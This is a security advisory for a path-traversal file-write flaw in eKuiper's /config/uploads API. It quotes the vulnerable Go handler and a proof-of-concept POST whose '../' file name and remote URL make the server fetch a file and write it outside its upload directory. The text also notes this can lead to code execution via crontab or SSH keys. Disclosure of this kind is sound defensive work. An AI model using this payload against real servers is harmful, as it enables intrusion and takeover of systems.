PT-2025-29376 — Github.Com/Lf-Edge/Ekuiper+1

PT-2025-29376 · Go · Github.Com/Lf-Edge/Ekuiper+1

Published

2025-07-03

Updated

2025-07-03

CVSS v4.0

7.3

High

Vector

AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Summary

eKuiper /config/uploads API supports accessing remote web URLs and saving files in the local upload directory, but there are no security restrictions, resulting in arbitrary file writing through ../. If run with root privileges, RCE can be achieved by writing crontab files or ssh keys.

Details

func fileUploadHandler(w http.ResponseWriter, r *http.Request) {
	switch r.Method {
	// Upload or overwrite a file
	case http.MethodPost:
		switch r.Header.Get("Content-Type") {
		case "application/json":
			fc := &fileContent{}
			defer r.Body.Close()
			err := json.NewDecoder(r.Body).Decode(fc)
			if err != nil {
				handleError(w, err, "Invalid body: Error decoding file json", logger)
				return
			}
			err = fc.Validate()
			if err != nil {
				handleError(w, err, "Invalid body: missing necessary field", logger)
				return
			}

			filePath := filepath.Join(uploadDir, fc.Name)
			err = upload(fc)

The fc.Name parameter do not safely filtered.

PoC

POST /config/uploads HTTP/1.1
Host: localhost:9081
Content-Type: application/json
Content-Length: 89

{
 "name": "../../../../tmp/success",
 "file": "http://192.168.65.254:8888/success"
}

Impact

Tested and verified only on 1.14.3 and 1.14.1, theoretically all versions using this code could be affected.

SSRF
Path-Travel
May leads to RCE

The reporters is m0d9 from Tencent YunDing Lab.

Fix

Unrestricted File Upload

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-434

Related Identifiers

GHSA-GJ54-GWJ9-X2C6

Affected Products

Github.Com/Lf-Edge/Ekuiper

Github.Com/Lf-Edge/Ekuiper/V2